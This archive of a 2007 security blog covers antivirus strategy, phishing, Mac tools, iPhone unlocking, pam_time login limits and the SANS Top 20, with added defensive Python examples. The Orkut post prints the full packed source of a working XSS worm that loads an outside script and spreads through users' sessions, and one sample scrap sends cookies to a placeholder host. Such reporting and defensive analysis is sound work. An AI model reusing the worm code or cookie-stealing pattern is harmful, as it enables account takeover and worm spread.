Monday, December 31, 2007

Herd Intelligence Against Internet Malware

Hi folks,
today I want to point out this article on InfoWorld about herd intelligence. As everybody knows, polymorphic worms can easily change from machine to machine, which makes life hard for antivirus companies. Antivirus and anti-malware products are often based on signature "fingerprints", and for that reason they are still easy to bypass. In this article the author describes how the companies want to solve this problem using herd intelligence. Who is the herd? Of course, we are! Yes, the companies are thinking of using their clients' computers to collect new malware, new virus signatures and so forth.


The idea is simple, according to the analyst. If attackers are going to attempt to create different attacks for nearly every individual user, then security software vendors must use their customers' machines as their eyes and ears for discovering and addressing those variants. (from site)


Well, this is an interesting (possible) solution to the problem, but what I still can't understand is why companies are fixated on fingerprint technologies. Using fingerprints means chasing malware, not preventing it and certainly not blocking it. What I keep asking myself is: why don't antivirus companies use behavioral detection techniques? There is a lot of research on dynamic malware detection based on API sequences and on data flows which, if well implemented and well planned, can really improve malware prevention. Why don't companies invest in this paradigm shift rather than turning their clients' computers into herd guinea pigs?
I'm pretty sure it would be cheaper, because building a herd of client computers means writing more client-side agents as well as rewriting the detection software. Moreover, building a herd means teaching people to understand it, teaching computer technicians to repair the new systems, trying to persuade people that the new agent sends only malware information and not sensitive information, and so on.
Another problem comes from the trusted computing field. How can we know that the new agents installed on our machines are safe? Again, how can we know that this software doesn't send sensitive and/or private information to the antivirus company? How can we assume that the antivirus company has good intentions?

If we take as an example the Diebold company and its voting machines, it's pretty easy to see that these assumptions are really too strong in the Internet era.
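As an added illustration of the behavioral alternative argued for in this post (example code written for this page, not from the InfoWorld article or from any antivirus vendor), here is a small Python comparison of the two approaches on constructed data: a hash "fingerprint" database that knows one variant of a family, against a detector that looks for ordered API-call patterns inside a window of a recorded trace. The samples, their byte strings, the API names and the two behaviour patterns are all made up for the demonstration.

```python
import hashlib

# Constructed samples (not real malware): two byte-different variants of one family
# that behave identically, and a benign updater sharing some of the same API calls.
SAMPLES = {
    "variant_a": {
        "bytes": b"MZ\x90\x00fake-dropper-build-1",
        "api_trace": ["CreateFileW", "WriteFile", "RegSetValueExW:Run", "CreateProcessW",
                      "InternetOpenW", "InternetReadFile", "WriteFile", "CreateProcessW"],
    },
    "variant_b": {  # repacked: different bytes, same behaviour, junk calls interleaved
        "bytes": b"MZ\x90\x00fake-dropper-build-2-repacked",
        "api_trace": ["Sleep", "GetTickCount", "CreateFileW", "WriteFile", "RegSetValueExW:Run",
                      "Sleep", "CreateProcessW", "InternetOpenW", "InternetReadFile", "WriteFile",
                      "GetTickCount", "CreateProcessW"],
    },
    "benign_updater": {
        "bytes": b"MZ\x90\x00vendor-updater",
        "api_trace": ["InternetOpenW", "InternetReadFile", "WriteFile", "CloseHandle"],
    },
}

# The "fingerprint" database: the vendor has only ever seen variant_a.
KNOWN_BAD_SHA256 = {hashlib.sha256(SAMPLES["variant_a"]["bytes"]).hexdigest()}

# Behavioural rules: ordered API-call patterns, matched as a subsequence inside a
# sliding window so that junk calls inserted between them do not break the match.
BEHAVIOUR_PATTERNS = {
    "drop_and_persist": ["WriteFile", "RegSetValueExW:Run", "CreateProcessW"],
    "download_and_execute": ["InternetOpenW", "InternetReadFile", "WriteFile", "CreateProcessW"],
}
WINDOW = 8


def signature_verdict(sample_bytes):
    """Classic fingerprint check: is this exact file in the known-bad hash set?"""
    return hashlib.sha256(sample_bytes).hexdigest() in KNOWN_BAD_SHA256


def _pattern_in_calls(pattern, calls):
    """Greedy subsequence check: does `pattern` occur in order within `calls`?"""
    pos = 0
    for call in calls:
        if call == pattern[pos]:
            pos += 1
            if pos == len(pattern):
                return True
    return False


def behavioral_verdict(api_trace, window=WINDOW):
    """Return the names of every pattern found in some window of the trace."""
    hits = []
    for name, pattern in BEHAVIOUR_PATTERNS.items():
        for start in range(len(api_trace)):
            if api_trace[start] == pattern[0] and _pattern_in_calls(
                    pattern, api_trace[start:start + window]):
                hits.append(name)
                break
    return hits


def classify_all():
    """Run both detectors over every sample; variant_b shows where fingerprints fail."""
    return {name: {"signature": signature_verdict(s["bytes"]),
                   "behaviour": behavioral_verdict(s["api_trace"])}
            for name, s in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in classify_all().items():
        print(f"{name:15} signature={verdict['signature']!s:5} behaviour={verdict['behaviour']}")
```

The window keeps long benign traces from matching a pattern by accident across unrelated activity; in a real sandbox you would also weight patterns rather than treat one hit as a verdict.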

Thursday, December 27, 2007

CourtTV: Tiger Team

Well, another nice saga from CourtTV. For those who know some tiger teams it will be really FUNNY; for those who don't know any tiger team it'll be a very interesting video. In any case, enjoy watching.



Here are the "Tiger Team 101" episodes.
First
Second
Third
Fourth

Saturday, December 22, 2007

XMAS: working with 20% of overflow ... ... ... ... ... ...

I know, it's Xmas. I should stop working and stay with my family, or something like that. Well, I really want to stop, but I'm still working on three different papers with deadlines at the end of January and February. It seems reasonable to stop blogging for a few days, but actually I don't know if I'll resist writing some news on my blog. Anyway, tomorrow I want to point out a very interesting post by Ann on her blog. Here you can find the original post (MSI Script vs Windows Security), where Ann describes how to:

1) change Windows system registry values;
2) run a low-level system tool.


By running a script (see the original post) during the installation phase, it's possible to get higher permissions. The main problem seems to be msiexec, which gets elevated privileges during the installation phase.

If you try to do this explicitly as a regular user (or without elevated privs on Vista), Windows will politely tell you that you can't. But if you execute the following MSI script during an installation (running the installation as a regular user), msiexec gets elevated privileges, and can do whatever you want. Here's an example silently disabling UAC during an installation by launching regedit from cmd. (This is run in Wise via 'Execute Program from Destination', Working directory: SystemFolder):

Another interesting project that I've seen during the past days is PhishTank. It's a website where dedicated volunteers submit URLs from suspected phishing websites and vote on whether the submissions are valid. The idea behind PhishTank is to bring together the expertise and enthusiasm of people across the Internet to fight phishing attacks. The more people participate, the larger the crowd, the more robust it should be against errors and perhaps even manipulation by attackers.
I'm interested in this project for several reasons, but one of the most important reasons that brought me to it was reading this paper from the University of Cambridge. Tyler Moore and Richard Clayton describe why and how this (great) service is vulnerable. I was amazed while reading it because it's impossible to understand how a pretty important conference like Financial Crypto could publish this kind of (easy and not innovative) work. Maybe my opinion of Financial Crypto is wrong.

Friday, December 21, 2007

I've read it online so it's true.

How many times do we hear:
"I don't agree with you, I've read something online that proves the opposite" or "I'm sure, I've read it online!".
But are you sure that everything you read online is true?



Well, now we are sure ! :-)
via Christofer

Thursday, December 20, 2007

Orkut was hacked !

It's amazing to realize that the main problems are always the same problems. Anyway, another XSS worm, but "today" it hits Google!




Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook’s of the world. It’s still widely used by the Portuguese population though.

From different sources:


On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. What it did was to start with scrapping a malicious flash file. Just viewing this scrap causes the flash object to load which in turn loads our favourite virus.js file. The Javascript code in that file first joins you in the community called Infectatos pelo Virus do Orkut (in English - Infected by the Orkut Virus) and then sends the same flash file as a scrap to as many people in your friends list as possible. So when each of your friends sees their Scrapbook, they in turn start propagating the worm to their friends, etc.



On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.
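The root cause described in the quotes above is that scraps accepted arbitrary HTML, so a Flash object could be planted that loaded the worm's script and then used the victim's own session to post more scraps. Here is an added example of the server-side mitigation, written in Python for this post and not part of the original post or of Orkut: an allowlist sanitizer that keeps a handful of formatting tags, drops embed, object, script and every event-handler attribute, and keeps only http(s) links. The sample scrap below is constructed; the hostnames in it are placeholders.

```python
import html
from html.parser import HTMLParser

# Conservative allowlist for user-posted "scrap" text: formatting only, no active content.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on* handlers, no style, no src anywhere
VOID_TAGS = {"br"}
SAFE_HREF_PREFIXES = ("http://", "https://")
# Tags whose inner text must be discarded too, not only the tag itself.
SKIP_CONTENT_TAGS = {"script", "style", "object"}


class ScrapSanitizer(HTMLParser):
    """Rebuilds the input keeping only allowlisted tags and attributes; everything
    else is dropped and every text node is re-escaped on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []        # tag names removed, useful for logging and abuse metrics
        self._skipping = None    # name of the tag whose content is being discarded

    def handle_starttag(self, tag, attrs):
        if self._skipping:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            if tag in SKIP_CONTENT_TAGS:
                self._skipping = tag
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                      # e.g. onclick, onload, style
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue                      # e.g. javascript: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skipping:
            if tag == self._skipping:
                self._skipping = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skipping:
            self.out.append(html.escape(data))


def sanitize_scrap(raw_html):
    """Return (clean_html, dropped_tags) for one user-submitted scrap."""
    parser = ScrapSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed scrap modelled on the worm's vector: a Flash embed and an inline
# script hidden behind innocent-looking formatting (hostnames are placeholders).
SAMPLE_SCRAP = (
    '<b>Hey!</b> look at this<br/>'
    '<embed src="http://example.invalid/virus.swf" type="application/x-shockwave-flash">'
    '<script>document.location="http://example.invalid/steal?" + document.cookie</script>'
    '<a href="javascript:alert(1)" onclick="steal()">click</a> '
    '<a href="https://example.invalid/photo">photo</a> &lt;3'
)

if __name__ == "__main__":
    clean, dropped = sanitize_scrap(SAMPLE_SCRAP)
    print(clean)
    print("dropped:", dropped)
```

The sanitizer does not try to balance stray closing tags; it only guarantees that no active content or scriptable attribute survives, which is the property the worm depended on being absent. The `dropped` list is the part worth feeding into monitoring: a sudden rise in dropped embed or script tags across many accounts is exactly the signal of a worm starting to spread.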


The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

// Dean Edwards' p,a,c,k,e,d unpacker, here named $; the packed worm body and its
// word dictionary are passed as the arguments and the unpacked code is handed to setTimeout.
function $(p,a,c,k,e,d) {
e=function(c) {
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}' +
'L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};' +
'7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");' +
'8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};' +
'5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};' +
'7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};' +
'7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");' +
't.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};' +
'3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);' +
'3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};' +
'7 V(){6(j==8.18("N").M){b};' +
'5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\');r.1o="\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1c="\\" 1e="\\">";' +
'5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();' +
'3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");' +
'3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};' +
'6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();',
62,150,
('|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|' +
'www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx' +
'|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|' +
'signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|' +
'readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|' +
'getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|' +
'createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|' +
'setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|' +
'history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|' +
'wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera' +
'|XMLHttpRequest|substring|virusdoorkut|CGI|Page').split('|'),0,{}),1
);
author="Rodrigo Lacerda"



Here is the complete decoded script.
And here is the original advisory.
And of course, if you try to search for something about this vulnerability on Google, you'll be redirected right here: the always up-to-date Google malware list.

Tuesday, December 18, 2007

Yet More Funny Stuff

Another funny picture, quite off-topic but so cute!

In my mailbox too.



The card.zip attachment contains card.scr (md5: 536BFC077FBAD247FA5EA67ADF1DCA7D), which we detect as
Trojan-Downloader.Win32.Agent.gbu.

Monday, December 17, 2007

Software upgrading.. .. .. ..

It's time to get up and see what new software has been made. It's been a long time since I focused my attention on the new software generation. During these days I decided to analyze two different pieces of software from the MacApp community.
Yet more useful and cheap Mac software to organize your computer.
The first one has been named Hazel 2 by its designers; it's a Mac cleaner, while the second one is a Time Machine configuration tool named TimeMachineScheduler, useful to manage advanced Time Machine capabilities.




From web site (click on the above picture):

Hazel watches whatever folders you tell it to, automatically organizing your files according to the rules you create. It features a rule interface similar to that of Apple Mail so you should feel right at home. Have Hazel move files around based on name, date, type, what site/email address it came from (Safari and Mail only) and much more. Automatically put your music in your Music folder, movies in Movies. Keep your downloads off the desktop and put them where they are supposed to be. Hazel can open, archive, set color labels and add Spotlight comments. And in Hazel 2, you can now have Hazel rename your files or sort them into subfolders based on name, date or whatever combination of attributes you choose. Hazel 2 gives you the ability to create even more powerful workflows than ever before. When you throw away applications, they can leave behind support files that never get cleaned up. With Hazel 2's App Sweep, Hazel will detect when you throw applications away, search for its support files and offer to throw those away as well. Uninstalling applications is integrated with your Trash so you don't even have to think about it. Hazel features new actions to import your files into iPhoto or iTunes. Keep your media in line. Add to your library or to a specific playlist or photo album. Improved Spotlight integration allows you to use any Spotlight attribute in your rules. Filter files based on Spotlight attributes or use them in conjunction with the new renaming and sorting actions. Sort your photos by aperture or shutter speed or rename your music files with artist, album and year. Make your metadata work for you. Hazel has options to clean out those pesky unneeded files that clutter your folders, getting rid of incomplete and duplicate downloads for you. And, of course, you can set up whatever rules you want to automatically throw files away. You can have Hazel manage your Trash. Select from different options to keep your Trash in check.
And for extra security, Hazel can also shred files like Finder's "Secure Empty Trash" option. Hazel's rules can trigger Automator workflows, AppleScripts and shell scripts. Hazel will run whatever you throw at it, making it easy for you to integrate into your workflow.








From the web site (click on the above picture):

In Mac OS X 10.5 Leopard Apple has introduced Time Machine, a very convenient way to make backups. Unfortunately the backup interval is preset constantly to one hour. Apple uses a launchd daemon to control the timing,
but changing the interval value in the launchd.plist file has no effect.
TimeMachineScheduler disables the automatic backup function of Time Machine and installs its own launchd agent. As the agent is located in the main library, the administrator password is required for all (writing) operations. Except disabling Time Machine no further system files and preferences will be touched by TimeMachineScheduler.
There are (still) some access privileges problems in OS X 10.5 Leopard, if the operating system has been updated, migrated or installed with the archive & install option. TimeMachineScheduler takes care of all files and sets owner, group and the privileges to the proper default value. You can install and uninstall the agent as well as only load and unload it to disable making backups temporarily. The interval can be set between 1 and 12 hours, and the agent can be set to run additionally at load, which means also at startup and login.
You can press a button to run a backup immediately. The status of the scheduler will be displayed. During a running backup the control elements are disabled. All actions will be written into a log file (~/Library/Logs/TimeMachineScheduler.log). TimeMachineScheduler is not required to run permanently, the scheduler works self dependent in the background. If you want to revert to the original settings of Time Machine, just uninstall the scheduler and enable Time Machine in its Preference Pane.
For the worst case (which will never happen) an "emergency" uninstaller is included.

I've only been trying this software for a few days, but I can say that (in particular the second one) it is really useful to manage your big pile of folders, files and whatever else. I'm pretty sad that Hazel is still under a commercial license, but it works really well.

Saturday, December 15, 2007

News on iPhone

Hi folks,
it's been a long time since I've talked about the iPhone cracking status. Actually I have the 1.1.1 firmware and I'm very happy not to change it because it's still working well. Anyway, what's happening in the iPhone hacking community? Are they still researching a solution? Yes and no... something has happened.




First of all, two theoretical exploits have been found in the new bootloader 4.6!
And you know what that means! The 1.1.2 OTB software unlock is coming very soon! Another important piece of news comes from the iPhone Dev Team, who opened their software. However, there is no solution yet to break the SIM lock and use any SIM card. Actually the community has just discovered the NCK (unlock code), but it's pretty hard to break with normal brute-force techniques.

The NCK code is transferred during activation of your iPhone.
A plist file is created on the iPhone, and then sent to Apple's webserver.
If the iPhone is unlocked in Apple's database, it will reply with the unlock code.
They have managed to send an activation request to Apple's webserver and catch the NCK.


It looks like this: "UnlockCode" = "NO=111111111111111&";

The '1's are to be replaced with digits, so I guess that the unlock code is 15 digits long.
Way too long for a brute-force attack... They doubt the unlock code has any correlation with any device IDs; it is more likely that Apple has it stored in a database for every single iPhone.
If you cannot wait for the software solution, which seems to be coming very soon, there is an easy-to-use and intuitive hardware solution by TurboSIM for $59 that works fine!

The reverse continues.

Thursday, December 13, 2007

Elevator And Peter G. Neumann

Obviously you can imagine the link between the absolute guru Peter G. Neumann and the elevator of my Miami Beach hotel. Well, it makes perfect sense, let me tell you...

It was a sunny and really hot day in Miami Beach (Florida) during the 23rd ACSAC conference. It was the first day of the conference; I was excited to be staying on the 17th floor of a very, very high hotel in front of the ocean. I took the elevator down to the "East Ocean" room to attend the first talk. Inside the big elevator an old man looked at me with a strange smile and asked me:



Hi, how's it going?


He looked at my name badge and said again:


Marco, nice to meet you. I'm Peter Neumann


I was astonished, paralyzed; I couldn't imagine that he was the "true" Neumann, and so I said:


Hello Peter, my name is Marco, from the University of Bologna


He smiled, like a person who knew that I hadn't recognized a famous personality like him...
Only after a few seconds did I realize that it was truly him. Perplexed, I followed him and said:


Sorry I didn't recognize you


I tried to improvise a few minutes of conversation and at the end I asked for a little autograph on my proceedings. Now I've got it.
I'm really proud to show it on my blog.


Tuesday, December 11, 2007

During Some Free Time

Sometimes I cannot understand why people don't want to read normal, easy papers but prefer asking (in this case, me) a lot of obvious things. During these days I received some mails asking how to change system administrator settings. In particular, some of my "old" students want to know how to restrict the login times of user accounts on a Linux system. Well, just two minutes of Google research and I found lots of great papers on this problem. Anyway, the easiest way to restrict the login times of user accounts is using pam_time.so by Andrew G. Morgan. Keep in mind that the main configuration file is /etc/security/time.conf.

Here is an easy example. Each line has the form:

Service;ttys;users;time

To limit ssh access from 23:00PM to 08:00AM (a hacker's favorite time) you can write the following line:

sshd;*;*;!Al2300-0800

The !Al term means anything except "all the days".

Another great example could be the following one:

login;*;!root;!Al1600-2000

It permits people from 4PM to 8PM every day, except root.
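To check what such rules actually do before putting them on a machine, here is an added Python evaluator of time.conf lines, written for this post and not part of pam_time itself. It follows the semantics described in the pam_time(8) and time.conf(5) manual pages: for every line whose services, ttys and users fields match the request, the times field must evaluate to true, otherwise access is denied; lines that do not match are ignored, and when no line denies, access is allowed. It implements the day abbreviations (Mo..Su, Wk, Wd, Al), midnight-crossing ranges, "*" globbing, "!" negation and "&"/"|" lists; the two rules from this post are the embedded sample configuration, and the user names and timestamps in the usage section are made up.

```python
import re
from datetime import datetime
from fnmatch import fnmatchcase

# Day abbreviations from time.conf, mapped to Python weekday numbers (Monday = 0).
DAY_CODES = {
    "Mo": {0}, "Tu": {1}, "We": {2}, "Th": {3}, "Fr": {4}, "Sa": {5}, "Su": {6},
    "Wk": {0, 1, 2, 3, 4}, "Wd": {5, 6}, "Al": {0, 1, 2, 3, 4, 5, 6},
}
TIME_ITEM = re.compile(r"^((?:[A-Z][a-z])+)(\d{2})(\d{2})-(\d{2})(\d{2})$")

# Sample configuration: the two rules from the post, plus a comment line.
SAMPLE_CONF = """
# services;ttys;users;times
sshd;*;*;!Al2300-0800
login;*;!root;!Al1600-2000
"""


def _eval_logic_list(field, item_matches):
    """Evaluate a pam_time logic list left to right: items joined by '&' or '|',
    an item may be negated with a leading '!'."""
    result, op = None, None
    for tok in re.split(r"([&|])", field):
        tok = tok.strip()
        if tok in ("&", "|"):
            op = tok
            continue
        value = item_matches(tok.lstrip("!"))
        if tok.startswith("!"):
            value = not value
        if result is None:
            result = value
        elif op == "&":
            result = result and value
        else:
            result = result or value
    return bool(result)


def _time_item_matches(item, weekday, minute_of_day):
    """Does one DAYSHHMM-HHMM item (e.g. Al2300-0800) cover this weekday and minute?"""
    m = TIME_ITEM.match(item)
    if not m:
        raise ValueError(f"bad time item: {item!r}")
    days, sh, sm, eh, em = m.groups()
    allowed_days = set().union(*(DAY_CODES[d] for d in re.findall(r"[A-Z][a-z]", days)))
    if weekday not in allowed_days:
        return False
    start, end = int(sh) * 60 + int(sm), int(eh) * 60 + int(em)
    if start <= end:                                   # same-day range, e.g. 1600-2000
        return start <= minute_of_day < end
    return minute_of_day >= start or minute_of_day < end   # wraps midnight, e.g. 2300-0800


def is_allowed(conf_text, service, tty, user, when):
    """True when pam_time would let `user` use `service` on `tty` at datetime `when`."""
    weekday, minute_of_day = when.weekday(), when.hour * 60 + when.minute
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        services, ttys, users, times = (f.strip() for f in line.split(";"))
        applies = (_eval_logic_list(services, lambda s: fnmatchcase(service, s))
                   and _eval_logic_list(ttys, lambda t: fnmatchcase(tty, t))
                   and _eval_logic_list(users, lambda u: fnmatchcase(user, u)))
        if applies and not _eval_logic_list(
                times, lambda t: _time_item_matches(t, weekday, minute_of_day)):
            return False       # a rule that applies excludes this moment: deny
    return True                # no rule denied the request


def check(service, user, iso_time, tty="pts/0", conf_text=SAMPLE_CONF):
    """Convenience wrapper taking an ISO 8601 timestamp string (e.g. 2007-12-11T23:30)."""
    return is_allowed(conf_text, service, tty, user, datetime.fromisoformat(iso_time))


if __name__ == "__main__":
    for args in [("sshd", "alice", "2007-12-11T23:30"), ("sshd", "alice", "2007-12-11T12:00"),
                 ("login", "alice", "2007-12-11T17:00"), ("login", "root", "2007-12-11T17:00")]:
        print(args, "->", "allowed" if check(*args) else "DENIED")
```

Running it shows the ssh rule denying at 23:30 and allowing at noon, and the login rule applying to alice but never to root, because the users field !root makes the line not apply to root at all. That is the kind of check worth doing with any deny-by-time rule: confirm who is left out of the restriction, not only when it fires.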

If I can suggest something to you: remember that the initial hardening is one of the most important procedures to increase the security of your machines. Be careful.

Friday, December 7, 2007

Annual Computer Security Applications Conference.

Hi folks,
I'm going to ACSAC next week.



I'll be in Miami Beach and Orlando, where I'll see the shuttle launch! Maybe I won't be able to update my blog corner, but if I find some free time I'll discuss what I see. I have never been to ACSAC, so I'm pretty curious to attend this event. Thank you very much to Marco Prandini for involving me in this activity!

Wednesday, December 5, 2007

California Electronic Voting.

My super boss said:


Electronic voting systems used throughout California still aren't good enough to be trusted with the state's elections, Secretary of State Debra Bowen said Saturday.
While Bowen has been putting tough restrictions and new security requirements on the use of the touch screen machines, she admitted having doubts as to whether the electronic voting systems will ever meet the standards she believes are needed in California.


And I thought... I know, I know ;-D. Anyway, it's an interesting article on the importance of voting machines in the USA.

Tuesday, December 4, 2007

MacBook Pro: the fastest Vista Notebook

PC World says that the MacBook Pro is the fastest notebook running Microsoft Vista!
It's pretty amazing news, I know, but if you consider that Apple has not hesitated to publish this new video, it becomes really amazing!




I like the Apple commercial videos; one of my favorites was "Security", but this one is one of the funniest I've ever seen!
Thanks, Apple, for these laughs!

Monday, December 3, 2007

SANS Top 20

Every year SANS publishes the top twenty vulnerabilities of the year, classified in different categories. This year:

Client-side Vulnerabilities in:
C1. Web Browsers
C2. Office Software
C3. Email Clients
C4. Media Players

Server-side Vulnerabilities in:
S1. Web Applications
S2. Windows Services
S3. Unix and Mac OS Services
S4. Backup Software
S5. Anti-virus Software
S6. Management Servers
S7. Database Software

Security Policy and Personnel:
H1. Excessive User Rights and Unauthorized Devices
H2. Phishing/Spear Phishing
H3. Unencrypted Laptops and Removable Media

Application Abuse:
A1. Instant Messaging
A2. Peer-to-Peer Programs

Network Devices:
N1. VoIP Servers and Phones

Zero Day Attacks:
Z1. Zero Day Attacks


In my opinion nothing has happened; the security landscape hasn't changed for many years. Client-side vulnerabilities are most often browser vulnerabilities, because browsers like Firefox and IE are the most used clients. On the other hand, web applications are growing and not every developer is careful about security issues, so it's reasonable that they are still first among the server-side vulnerabilities. But actually I don't agree with the positions of H1 and H2. My personal experience in security says that phishing is one of the most important security problems of the current era. Preventing phishing means addressing both the technical security aspects and the social security aspects; on the first, lots of groups are working with great results, but on the social aspects the evangelist community is still behind. For this reason phishing is one of the most important and most used attacks. H1 is of course a really important problem, but one fought more during past security history; I believe that many steps have already been taken in this particular direction, and for this reason it is not comparable with the more recent phishing.